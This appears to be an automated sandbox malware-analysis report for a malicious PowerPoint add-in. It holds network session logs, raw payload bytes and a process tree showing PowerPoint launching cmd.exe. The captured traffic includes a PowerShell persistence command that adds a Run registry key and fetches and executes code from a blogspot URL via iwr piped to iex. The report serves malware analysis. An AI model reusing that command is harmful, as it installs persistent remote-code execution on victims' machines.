                                                                                                                                                                      2022-01-14 11:21:11 UTC827INData Raw: 2c 38 2c 31 31 38 2c 35 2c 31 32 33 2c 31 33 30 2c 31 32 35 2c 31 39 33 2c 31 36 37 2c 31 39 32 2c 31 36 37 2c 31 39 33 2c 33 33 2c 31 39 38 2c 34 34 2c 32 32 36 2c 31 31 32 2c 32 34 30 2c 32 35 2c 39 39 2c 35 35 2c 32 32 36 2c 38 38 2c 32 32 37 2c 32 31 31 2c 31 39 36 2c 39 2c 31 39 38 2c 31 34 35 2c 31 39 36 2c 32 30 31 2c 31 39 38 2c 39 2c 31 39 36 2c 31 30 33 2c 31 34 31 2c 35 31 2c 31 33 36 2c 32 30 37 2c 31 32 39 2c 32 30 37 2c 31 33 31 2c 32 34 33 2c 31 34 30 2c 31 31 2c 31 33 36 2c 32 33 37 2c 31 38 39 2c 35 37 2c 32 33 2c 32 36 2c 39 35 2c 33 35 2c 31 39 30 2c 31 30 38 2c 39 32 2c 36 39 2c 31 32 34 2c 32 31 33 2c 32 34 38 2c 33 30 2c 32 34 31 2c 31 31 37 2c 32 32 37 2c 31 39 39 2c 31 32 34 2c 31 35 38 2c 32 32 32 2c 31 35 36 2c 31 31 31 2c 31 36
                                                                                                                                                                      Data Ascii: ,8,118,5,123,130,125,193,167,192,167,193,33,198,44,226,112,240,25,99,55,226,88,227,211,196,9,198,145,196,201,198,9,196,103,141,51,136,207,129,207,131,243,140,11,136,237,189,57,23,26,95,35,190,108,92,69,124,213,248,30,241,117,227,199,124,158,222,156,111,16
                                                                                                                                                                      2022-01-14 11:21:11 UTC843INData Raw: 2c 33 36 2c 32 33 36 2c 31 37 32 2c 31 38 30 2c 35 31 2c 34 38 2c 32 30 33 2c 37 31 2c 39 38 2c 31 39 31 2c 31 31 2c 39 2c 35 35 2c 31 36 39 2c 32 30 37 2c 31 34 36 2c 32 30 35 2c 31 36 32 2c 31 31 38 2c 32 35 2c 31 38 31 2c 31 30 31 2c 32 31 30 2c 31 37 34 2c 33 39 2c 32 32 30 2c 31 36 36 2c 32 31 38 2c 31 35 37 2c 34 35 2c 31 39 34 2c 31 31 30 2c 31 36 31 2c 32 32 2c 31 38 34 2c 38 35 2c 32 31 36 2c 36 33 2c 31 37 36 2c 32 34 36 2c 32 31 30 2c 33 30 2c 31 39 33 2c 37 34 2c 31 38 33 2c 32 31 34 2c 39 35 2c 37 2c 31 39 37 2c 31 33 31 2c 37 30 2c 32 35 35 2c 38 38 2c 32 31 32 2c 31 32 2c 31 33 37 2c 31 38 38 2c 31 31 38 2c 32 34 39 2c 39 39 2c 38 31 2c 31 31 35 2c 37 36 2c 31 31 36 2c 31 36 33 2c 32 31 38 2c 31 37 37 2c 32 33 37 2c 31 36 32 2c 32 33 30 2c
                                                                                                                                                                      Data Ascii: ,36,236,172,180,51,48,203,71,98,191,11,9,55,169,207,146,205,162,118,25,181,101,210,174,39,220,166,218,157,45,194,110,161,22,184,85,216,63,176,246,210,30,193,74,183,214,95,7,197,131,70,255,88,212,12,137,188,118,249,99,81,115,76,116,163,218,177,237,162,230,
                                                                                                                                                                      2022-01-14 11:21:11 UTC859INData Raw: 37 30 2c 31 36 32 2c 32 30 32 2c 35 34 2c 31 36 33 2c 32 35 33 2c 32 30 31 2c 39 39 2c 31 37 30 2c 31 30 38 2c 31 30 33 2c 31 31 35 2c 31 32 36 2c 31 34 39 2c 35 34 2c 39 38 2c 32 30 33 2c 31 35 31 2c 32 30 35 2c 31 30 39 2c 34 34 2c 31 35 34 2c 36 39 2c 31 37 36 2c 32 34 39 2c 34 34 2c 31 33 34 2c 31 39 37 2c 31 37 39 2c 37 36 2c 31 32 32 2c 39 33 2c 31 30 30 2c 31 35 35 2c 32 38 2c 37 36 2c 32 33 34 2c 31 31 37 2c 31 31 38 2c 31 34 31 2c 32 33 32 2c 32 30 37 2c 32 35 34 2c 31 31 33 2c 31 37 36 2c 31 36 2c 31 33 2c 31 34 32 2c 31 34 31 2c 32 31 33 2c 31 38 37 2c 31 37 32 2c 34 39 2c 38 31 2c 38 31 2c 31 35 34 2c 31 38 2c 32 39 2c 31 34 39 2c 32 33 38 2c 36 38 2c 31 35 2c 31 30 31 2c 35 38 2c 31 37 37 2c 31 34 36 2c 32 30 35 2c 33 37 2c 32 35 30 2c 31 37
                                                                                                                                                                      Data Ascii: 70,162,202,54,163,253,201,99,170,108,103,115,126,149,54,98,203,151,205,109,44,154,69,176,249,44,134,197,179,76,122,93,100,155,28,76,234,117,118,141,232,207,254,113,176,16,13,142,141,213,187,172,49,81,81,154,18,29,149,238,68,15,101,58,177,146,205,37,250,17
                                                                                                                                                                      2022-01-14 11:21:11 UTC875INData Raw: 2c 31 38 35 2c 31 38 2c 32 32 31 2c 32 33 32 2c 31 37 31 2c 35 39 2c 32 30 39 2c 36 36 2c 34 37 2c 31 35 2c 31 32 32 2c 31 32 31 2c 32 31 30 2c 32 30 33 2c 31 33 39 2c 39 34 2c 32 32 32 2c 31 38 30 2c 32 32 31 2c 31 33 35 2c 39 34 2c 31 39 30 2c 32 34 34 2c 31 30 36 2c 36 38 2c 32 34 34 2c 31 36 33 2c 31 37 35 2c 32 35 34 2c 32 34 34 2c 31 30 36 2c 37 36 2c 31 37 35 2c 30 2c 39 38 2c 33 32 2c 31 38 39 2c 31 33 30 2c 32 33 32 2c 32 31 2c 37 36 2c 33 30 2c 36 36 2c 31 38 30 2c 32 31 30 2c 34 33 2c 31 34 38 2c 32 31 38 2c 39 37 2c 32 34 34 2c 31 37 38 2c 32 30 39 2c 34 33 2c 31 35 36 2c 39 34 2c 31 31 38 2c 31 32 32 2c 36 39 2c 32 30 38 2c 34 33 2c 31 34 36 2c 39 34 2c 38 31 2c 32 34 34 2c 31 33 38 2c 31 36 36 2c 38 37 2c 31 32 2c 31 38 39 2c 39 38 2c 31 33
                                                                                                                                                                      Data Ascii: ,185,18,221,232,171,59,209,66,47,15,122,121,210,203,139,94,222,180,221,135,94,190,244,106,68,244,163,175,254,244,106,76,175,0,98,32,189,130,232,21,76,30,66,180,210,43,148,218,97,244,178,209,43,156,94,118,122,69,208,43,146,94,81,244,138,166,87,12,189,98,13
                                                                                                                                                                      2022-01-14 11:21:11 UTC890INData Raw: 31 35 36 2c 31 36 36 2c 32 31 36 2c 37 32 2c 36 39 2c 32 32 34 2c 32 34 2c 37 30 2c 31 31 35 2c 31 30 35 2c 31 31 39 2c 31 35 33 2c 31 35 35 2c 31 36 31 2c 31 39 2c 38 36 2c 31 30 39 2c 31 30 34 2c 39 38 2c 33 33 2c 31 35 33 2c 31 35 35 2c 32 31 35 2c 31 35 2c 32 37 2c 32 31 39 2c 31 39 35 2c 32 31 32 2c 36 34 2c 35 30 2c 31 32 2c 31 38 30 2c 34 30 2c 36 2c 36 34 2c 36 38 2c 31 36 32 2c 31 39 38 2c 31 34 36 2c 33 37 2c 32 33 37 2c 33 37 2c 37 34 2c 39 32 2c 31 38 30 2c 33 30 2c 31 36 37 2c 32 30 37 2c 31 36 30 2c 33 37 2c 31 37 38 2c 33 35 2c 32 33 36 2c 31 35 37 2c 31 39 31 2c 32 35 2c 32 32 33 2c 31 32 37 2c 33 39 2c 39 30 2c 32 32 30 2c 38 39 2c 31 34 33 2c 31 30 38 2c 32 34 34 2c 32 34 31 2c 31 31 39 2c 33 33 2c 35 2c 39 37 2c 35 35 2c 34 36 2c 31 38
                                                                                                                                                                      Data Ascii: 156,166,216,72,69,224,24,70,115,105,119,153,155,161,19,86,109,104,98,33,153,155,215,15,27,219,195,212,64,50,12,180,40,6,64,68,162,198,146,37,237,37,74,92,180,30,167,207,160,37,178,35,236,157,191,25,223,127,39,90,220,89,143,108,244,241,119,33,5,97,55,46,18
                                                                                                                                                                      2022-01-14 11:21:11 UTC906INData Raw: 2c 32 33 36 2c 31 35 2c 31 33 35 2c 31 35 32 2c 31 30 33 2c 31 35 33 2c 31 37 36 2c 37 30 2c 34 30 2c 31 39 2c 35 34 2c 38 2c 31 35 39 2c 31 33 2c 34 32 2c 39 35 2c 36 30 2c 32 30 36 2c 31 35 36 2c 35 35 2c 31 33 31 2c 39 2c 31 35 39 2c 39 35 2c 31 36 38 2c 32 33 31 2c 32 2c 39 2c 33 37 2c 31 31 37 2c 31 38 39 2c 34 2c 31 39 34 2c 33 33 2c 32 34 31 2c 31 30 36 2c 37 32 2c 32 34 39 2c 35 38 2c 36 37 2c 31 38 2c 31 31 39 2c 34 33 2c 31 37 32 2c 31 32 34 2c 31 39 30 2c 32 30 30 2c 32 31 38 2c 39 35 2c 31 34 36 2c 32 35 34 2c 31 38 2c 32 34 38 2c 32 30 2c 39 33 2c 31 32 33 2c 31 33 34 2c 32 32 38 2c 38 37 2c 38 30 2c 31 34 33 2c 33 35 2c 31 32 31 2c 32 32 33 2c 39 2c 34 31 2c 31 31 32 2c 36 36 2c 32 30 30 2c 31 37 35 2c 31 32 39 2c 31 36 33 2c 36 36 2c 31 38
                                                                                                                                                                      Data Ascii: ,236,15,135,152,103,153,176,70,40,19,54,8,159,13,42,95,60,206,156,55,131,9,159,95,168,231,2,9,37,117,189,4,194,33,241,106,72,249,58,67,18,119,43,172,124,190,200,218,95,146,254,18,248,20,93,123,134,228,87,80,143,35,121,223,9,41,112,66,200,175,129,163,66,18
                                                                                                                                                                      2022-01-14 11:21:11 UTC922INData Raw: 37 2c 34 38 2c 38 2c 36 37 2c 32 34 35 2c 38 2c 32 35 35 2c 31 39 36 2c 31 30 36 2c 31 39 31 2c 33 35 2c 31 31 2c 32 39 2c 31 34 35 2c 37 2c 31 34 33 2c 32 32 37 2c 31 35 37 2c 31 32 39 2c 34 36 2c 34 33 2c 39 38 2c 31 38 32 2c 31 33 36 2c 39 35 2c 35 36 2c 32 30 39 2c 37 2c 31 32 31 2c 31 30 36 2c 36 39 2c 32 32 37 2c 31 31 39 2c 32 33 37 2c 31 35 2c 31 33 32 2c 31 35 31 2c 34 31 2c 32 33 32 2c 31 34 33 2c 32 30 30 2c 32 34 34 2c 37 31 2c 32 31 34 2c 31 31 30 2c 31 30 35 2c 31 39 39 2c 36 2c 32 33 30 2c 31 30 37 2c 31 31 37 2c 31 37 2c 31 39 31 2c 31 31 36 2c 32 33 31 2c 31 34 35 2c 31 30 33 2c 32 35 33 2c 31 30 33 2c 31 36 2c 31 38 36 2c 32 33 34 2c 31 30 31 2c 32 33 32 2c 31 34 39 2c 31 35 2c 34 34 2c 31 32 31 2c 32 34 2c 32 32 36 2c 35 36 2c 33 31 2c
                                                                                                                                                                      Data Ascii: 7,48,8,67,245,8,255,196,106,191,35,11,29,145,7,143,227,157,129,46,43,98,182,136,95,56,209,7,121,106,69,227,119,237,15,132,151,41,232,143,200,244,71,214,110,105,199,6,230,107,117,17,191,116,231,145,103,253,103,16,186,234,101,232,149,15,44,121,24,226,56,31,
                                                                                                                                                                      2022-01-14 11:21:11 UTC938INData Raw: 31 39 30 2c 32 38 2c 31 36 35 2c 31 39 39 2c 32 34 34 2c 31 38 30 2c 37 35 2c 31 30 35 2c 33 33 2c 31 39 38 2c 31 32 34 2c 31 34 36 2c 32 30 35 2c 35 30 2c 35 34 2c 32 39 2c 34 35 2c 39 36 2c 32 38 2c 31 37 32 2c 31 35 34 2c 31 30 37 2c 32 35 33 2c 32 33 35 2c 31 35 2c 32 31 31 2c 32 39 2c 31 33 2c 33 38 2c 31 36 36 2c 31 34 31 2c 32 33 34 2c 35 33 2c 35 31 2c 31 38 33 2c 31 33 31 2c 32 32 32 2c 37 39 2c 32 32 32 2c 34 37 2c 35 36 2c 32 33 2c 38 31 2c 31 30 30 2c 31 30 32 2c 34 35 2c 32 32 33 2c 31 35 32 2c 38 38 2c 32 32 30 2c 32 34 38 2c 32 34 32 2c 35 31 2c 38 30 2c 32 2c 31 30 37 2c 38 37 2c 32 33 36 2c 34 32 2c 31 35 32 2c 38 39 2c 33 38 2c 32 31 37 2c 36 39 2c 32 32 38 2c 31 31 2c 32 30 30 2c 31 33 31 2c 32 32 31 2c 31 35 36 2c 37 34 2c 39 31 2c 34
                                                                                                                                                                      Data Ascii: 190,28,165,199,244,180,75,105,33,198,124,146,205,50,54,29,45,96,28,172,154,107,253,235,15,211,29,13,38,166,141,234,53,51,183,131,222,79,222,47,56,23,81,100,102,45,223,152,88,220,248,242,51,80,2,107,87,236,42,152,89,38,217,69,228,11,200,131,221,156,74,91,4
                                                                                                                                                                      2022-01-14 11:21:11 UTC954INData Raw: 31 2c 38 39 2c 32 32 37 2c 32 30 30 2c 31 32 38 2c 31 30 2c 35 33 2c 31 38 38 2c 31 37 33 2c 31 39 36 2c 31 39 38 2c 31 35 34 2c 32 31 38 2c 31 30 38 2c 37 32 2c 34 30 2c 32 31 36 2c 31 34 34 2c 31 35 2c 34 37 2c 31 34 34 2c 37 2c 36 34 2c 31 39 39 2c 32 31 37 2c 31 32 2c 32 30 30 2c 32 30 38 2c 31 34 30 2c 32 35 2c 31 30 38 2c 39 37 2c 31 36 30 2c 31 33 32 2c 31 36 35 2c 31 30 34 2c 31 37 36 2c 32 30 35 2c 34 32 2c 31 34 35 2c 31 38 39 2c 31 35 36 2c 31 33 2c 31 30 31 2c 31 31 33 2c 31 38 32 2c 31 38 2c 32 33 36 2c 33 33 2c 36 37 2c 31 33 37 2c 32 30 31 2c 31 37 34 2c 32 30 31 2c 32 31 39 2c 31 38 37 2c 31 39 31 2c 33 36 2c 31 31 31 2c 32 33 39 2c 35 33 2c 35 34 2c 31 2c 31 31 33 2c 32 30 34 2c 31 36 33 2c 31 39 31 2c 32 34 38 2c 31 34 36 2c 38 32 2c 31
                                                                                                                                                                      Data Ascii: 1,89,227,200,128,10,53,188,173,196,198,154,218,108,72,40,216,144,15,47,144,7,64,199,217,12,200,208,140,25,108,97,160,132,165,104,176,205,42,145,189,156,13,101,113,182,18,236,33,67,137,201,174,201,219,187,191,36,111,239,53,54,1,113,204,163,191,248,146,82,1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.3 | 49834 | 142.250.186.129 | 443 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:17 UTC | 965 | OUT | GET /atom.xml HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: p6tbbb.blogspot.com
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:17 UTC | 966 | IN | HTTP/1.1 302 Found
                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                      ETag: W/"76994fcf688c1d67e3733d8c335322d774ccdec6a6cee5a150ea445829fd35f1"
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:17 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Server: blogger-renderd
                                                                                                                                                                      Expires: Fri, 14 Jan 2022 11:21:18 GMT
                                                                                                                                                                      Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                      Location: https://www.mediafire.com/file/5avuvurhf9r42y3/6.dll/file
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.3 | 49835 | 104.16.202.237 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:17 UTC | 966 | OUT | GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: www.mediafire.com
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:18 UTC | 966 | IN | HTTP/1.1 302 Found
                                                                                                                                                                      Date: Fri, 14 Jan 2022 11:21:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7l; expires=Tue, 14-Jan-2042 11:21:18 GMT; Max-Age=631152000; path=/; domain=.mediafire.com; HttpOnly
                                                                                                                                                                      Strict-Transport-Security: max-age=0
                                                                                                                                                                      Access-Control-Allow-Origin: https://www.mediafire.com
                                                                                                                                                                      Location: https://download2262.mediafire.com/1rxjqgtrygkg/5avuvurhf9r42y3/6.dll
                                                                                                                                                                      Report-To: {"group": "mediafirenel", "max_age": 86400, "include_subdomains": true, "endpoints": [{"url": "https://browser-reports.mediafire.dev/network-error"}]}
                                                                                                                                                                      NEL: {"report_to": "mediafirenel", "max_age": 86400, "include_subdomains": true, "failure_fraction": 0.01}
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                      Set-Cookie: __cf_bm=J48jKY80L4vekZlTulNazJn9_8Kc6roTO05sIZmXGYU-1642159278-0-AZNkZ79+DEEY8vaOdewnar8BWaW+TknYGniGDCCs5gjuaTLSHFawSVLDp7OTuPiloYyEg+y3bxt04+LJANBSUQ8=; path=/; expires=Fri, 14-Jan-22 11:51:18 GMT; domain=.mediafire.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 6cd67ade699d4e07-FRA
2022-01-14 11:21:18 UTC | 968 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.3 | 49836 | 199.91.155.3 | 443 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
2022-01-14 11:21:18 UTC | 968 | OUT | GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
                                                                                                                                                                      Host: download2262.mediafire.com
                                                                                                                                                                      Cookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7l
                                                                                                                                                                      Connection: Keep-Alive
2022-01-14 11:21:19 UTC | 968 | IN | HTTP/1.1 200 OK
                                                                                                                                                                      server: dsp-0.0.1
                                                                                                                                                                      content-type: text/plain
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      connection: close
                                                                                                                                                                      content-encoding: binary
                                                                                                                                                                      cache-control: no-store
                                                                                                                                                                      x-robots-tag: noindex, nofollow
                                                                                                                                                                      content-disposition: attachment; filename="6.dll"
                                                                                                                                                                      content-length: 490941
                                                                                                                                                                      date: Fri, 14 Jan 2022 11:21:18 GMT
2022-01-14 11:21:19 UTC | 968 | IN | Data Ascii: start-sleep -s 5
New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "NetwrixParam" -Value "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""https://p6tbbb.blogspot.com/atom.xml"" -useB|ie
                                                                                                                                                                      Data Ascii: 220,114,131,10,220,175,99,74,38,165,191,180,146,75,13,95,65,145,254,34,20,69,63,118,203,1,117,1,123,109,74,13,169,52,252,126,87,29,131,103,117,92,205,171,17,53,150,41,149,31,59,160,204,122,62,150,201,186,253,41,168,221,18,54,136,84,62,45,234,69,183,51,227
                                                                                                                                                                      2022-01-14 11:21:19 UTC1379INData Raw: 32 32 2c 31 34 30 2c 31 39 36 2c 35 36 2c 32 32 35 2c 33 36 2c 39 37 2c 31 33 30 2c 34 38 2c 37 33 2c 31 35 32 2c 31 34 36 2c 31 39 33 2c 31 36 31 2c 31 39 37 2c 38 33 2c 33 36 2c 31 36 36 2c 39 2c 35 31 2c 31 33 32 2c 38 39 2c 31 38 35 2c 31 33 33 2c 33 36 2c 31 35 38 2c 33 38 2c 31 31 33 2c 31 33 34 2c 31 31 32 2c 31 35 30 2c 31 31 32 2c 31 34 32 2c 31 31 32 2c 31 35 38 2c 32 30 38 2c 37 37 2c 35 36 2c 36 34 2c 35 36 2c 34 30 2c 33 35 2c 31 39 36 2c 31 32 34 2c 33 31 2c 33 34 2c 32 30 39 2c 36 37 2c 32 33 32 2c 33 37 2c 32 38 2c 31 35 30 2c 36 35 2c 31 39 2c 31 34 32 2c 31 38 2c 32 35 30 2c 38 2c 32 30 31 2c 33 2c 32 33 36 2c 31 37 2c 33 33 2c 36 39 2c 37 32 2c 31 39 2c 39 32 2c 31 39 34 2c 36 30 2c 33 36 2c 31 32 36 2c 37 38 2c 38 2c 31 39 34 2c 32 2c
                                                                                                                                                                      Data Ascii: 22,140,196,56,225,36,97,130,48,73,152,146,193,161,197,83,36,166,9,51,132,89,185,133,36,158,38,113,134,112,150,112,142,112,158,208,77,56,64,56,40,35,196,124,31,34,209,67,232,37,28,150,65,19,142,18,250,8,201,3,236,17,33,69,72,19,92,194,60,36,126,78,8,194,2,
                                                                                                                                                                      2022-01-14 11:21:19 UTC1395INData Raw: 38 2c 31 33 31 2c 37 32 2c 38 36 2c 31 36 2c 31 34 33 2c 38 36 2c 31 35 38 2c 31 39 39 2c 31 38 31 2c 39 2c 31 36 35 2c 31 35 34 2c 32 33 32 2c 31 39 37 2c 31 39 36 2c 31 36 34 2c 31 33 38 2c 32 34 35 2c 31 35 33 2c 32 32 2c 32 31 2c 31 31 30 2c 31 33 38 2c 35 37 2c 38 32 2c 31 37 38 2c 32 30 31 2c 31 38 33 2c 31 33 39 2c 31 36 36 2c 31 33 36 2c 31 30 39 2c 31 33 39 2c 32 30 39 2c 32 34 33 2c 34 38 2c 31 30 37 2c 39 38 2c 31 33 2c 38 39 2c 34 32 2c 31 35 39 2c 38 38 2c 31 38 37 2c 31 37 33 2c 37 37 2c 31 30 38 2c 32 31 39 2c 31 34 35 2c 31 39 33 2c 31 34 30 2c 32 2c 32 35 33 2c 32 33 36 2c 31 32 36 2c 32 30 38 2c 31 36 36 2c 31 38 30 2c 32 30 38 2c 38 38 2c 31 37 37 2c 32 39 2c 32 31 33 2c 32 31 32 2c 32 30 2c 31 33 39 2c 35 37 2c 32 33 37 2c 31 37 37 2c
                                                                                                                                                                      Data Ascii: 8,131,72,86,16,143,86,158,199,181,9,165,154,232,197,196,164,138,245,153,22,21,110,138,57,82,178,201,183,139,166,136,109,139,209,243,48,107,98,13,89,42,159,88,187,173,77,108,219,145,193,140,2,253,236,126,208,166,180,208,88,177,29,213,212,20,139,57,237,177,
                                                                                                                                                                      2022-01-14 11:21:19 UTC1411INData Raw: 30 2c 31 32 37 2c 37 34 2c 32 34 38 2c 31 38 38 2c 38 39 2c 31 33 35 2c 31 35 30 2c 31 32 2c 31 32 36 2c 33 31 2c 31 38 30 2c 34 30 2c 35 30 2c 31 31 36 2c 32 30 31 2c 32 34 30 2c 32 32 34 2c 32 34 36 2c 31 32 32 2c 32 30 2c 32 33 38 2c 35 37 2c 32 31 34 2c 39 2c 32 31 31 2c 39 34 2c 31 39 38 2c 31 34 30 2c 32 31 33 2c 32 32 37 2c 38 33 2c 32 33 38 2c 32 35 35 2c 32 30 30 2c 31 35 32 2c 31 38 31 2c 39 32 2c 37 36 2c 31 36 32 2c 31 34 30 2c 31 35 38 2c 33 37 2c 31 32 36 2c 35 37 2c 32 34 35 2c 38 31 2c 31 31 34 2c 32 32 35 2c 32 34 35 2c 31 37 39 2c 39 31 2c 32 33 30 2c 31 31 31 2c 31 30 37 2c 31 35 33 2c 32 33 37 2c 31 37 39 2c 32 31 36 2c 35 36 2c 31 33 35 2c 37 31 2c 31 34 39 2c 32 30 35 2c 32 35 35 2c 36 2c 38 35 2c 31 39 30 2c 31 39 31 2c 33 34 2c 33
                                                                                                                                                                      Data Ascii: 0,127,74,248,188,89,135,150,12,126,31,180,40,50,116,201,240,224,246,122,20,238,57,214,9,211,94,198,140,213,227,83,238,255,200,152,181,92,76,162,140,158,37,126,57,245,81,114,225,245,179,91,230,111,107,153,237,179,216,56,135,71,149,205,255,6,85,190,191,34,3
                                                                                                                                                                      2022-01-14 11:21:19 UTC1427INData Raw: 2c 38 2c 32 31 31 2c 31 38 34 2c 31 31 33 2c 31 31 30 2c 31 39 36 2c 39 33 2c 31 33 36 2c 39 33 2c 32 32 34 2c 32 32 34 2c 32 31 36 2c 34 36 2c 31 38 38 2c 31 31 34 2c 31 33 32 2c 31 39 2c 38 2c 32 30 37 2c 34 2c 32 33 37 2c 32 30 2c 39 33 2c 31 33 33 2c 31 30 35 2c 32 32 37 2c 32 34 34 2c 31 36 33 2c 32 35 31 2c 31 30 36 2c 31 33 32 2c 31 30 37 2c 39 36 2c 33 35 2c 31 39 34 2c 37 34 2c 32 31 36 2c 31 34 32 2c 32 34 30 2c 34 34 2c 32 31 36 2c 31 34 31 2c 32 30 38 2c 31 2c 31 38 33 2c 33 34 2c 31 37 32 2c 31 33 30 2c 31 35 39 2c 31 39 38 2c 32 33 33 2c 37 31 2c 32 34 30 2c 31 38 33 2c 32 32 36 2c 31 31 36 2c 35 2c 31 36 37 2c 32 32 31 2c 31 31 2c 32 35 2c 37 31 2c 32 32 36 2c 31 33 38 2c 34 35 2c 31 31 33 2c 31 35 32 2c 36 34 2c 38 39 2c 36 33 2c 32 31 31
                                                                                                                                                                      Data Ascii: ,8,211,184,113,110,196,93,136,93,224,224,216,46,188,114,132,19,8,207,4,237,20,93,133,105,227,244,163,251,106,132,107,96,35,194,74,216,142,240,44,216,141,208,1,183,34,172,130,159,198,233,71,240,183,226,116,5,167,221,11,25,71,226,138,45,113,152,64,89,63,211
                                                                                                                                                                      2022-01-14 11:21:19 UTC1443INData Raw: 32 2c 35 36 2c 31 32 31 2c 32 31 37 2c 31 37 37 2c 31 35 37 2c 38 37 2c 34 35 2c 32 34 35 2c 32 32 30 2c 31 37 2c 35 32 2c 31 33 39 2c 31 39 31 2c 36 32 2c 32 32 35 2c 32 35 34 2c 32 30 35 2c 32 32 35 2c 36 37 2c 39 35 2c 32 34 38 2c 31 38 33 2c 31 35 39 2c 31 38 33 2c 39 35 2c 32 31 36 2c 32 35 34 2c 32 30 35 2c 39 39 2c 32 32 35 2c 31 39 39 2c 31 39 30 2c 31 31 37 2c 32 34 38 2c 32 33 32 2c 31 35 38 2c 32 31 39 2c 32 30 32 2c 36 33 2c 35 36 2c 32 34 33 2c 32 32 34 2c 31 31 31 2c 32 34 36 2c 35 37 2c 32 32 32 2c 31 32 31 2c 39 34 2c 38 37 2c 32 35 30 2c 31 35 2c 39 30 2c 32 31 35 2c 31 31 35 2c 32 30 37 2c 31 39 31 2c 32 34 34 2c 32 33 35 2c 39 31 2c 31 32 36 2c 32 34 36 2c 32 35 30 2c 32 35 31 2c 32 33 2c 32 32 33 2c 31 38 39 2c 38 38 2c 32 36 2c 32 35
                                                                                                                                                                      Data Ascii: 2,56,121,217,177,157,87,45,245,220,17,52,139,191,62,225,254,205,225,67,95,248,183,159,183,95,216,254,205,99,225,199,190,117,248,232,158,219,202,63,56,243,224,111,246,57,222,121,94,87,250,15,90,215,115,207,191,244,235,91,126,246,250,251,23,223,189,88,26,25


                                                                                                                                                                      Code Manipulations

                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:24
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding
                                                                                                                                                                      Imagebase:0x290000
                                                                                                                                                                      File size:1849008 bytes
                                                                                                                                                                      MD5 hash:68F52CD14C61DDC941769B55AE3F2EE9
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:38
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam"
                                                                                                                                                                      Imagebase:0xd80000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:12:19:39
                                                                                                                                                                      Start date:14/01/2022
                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
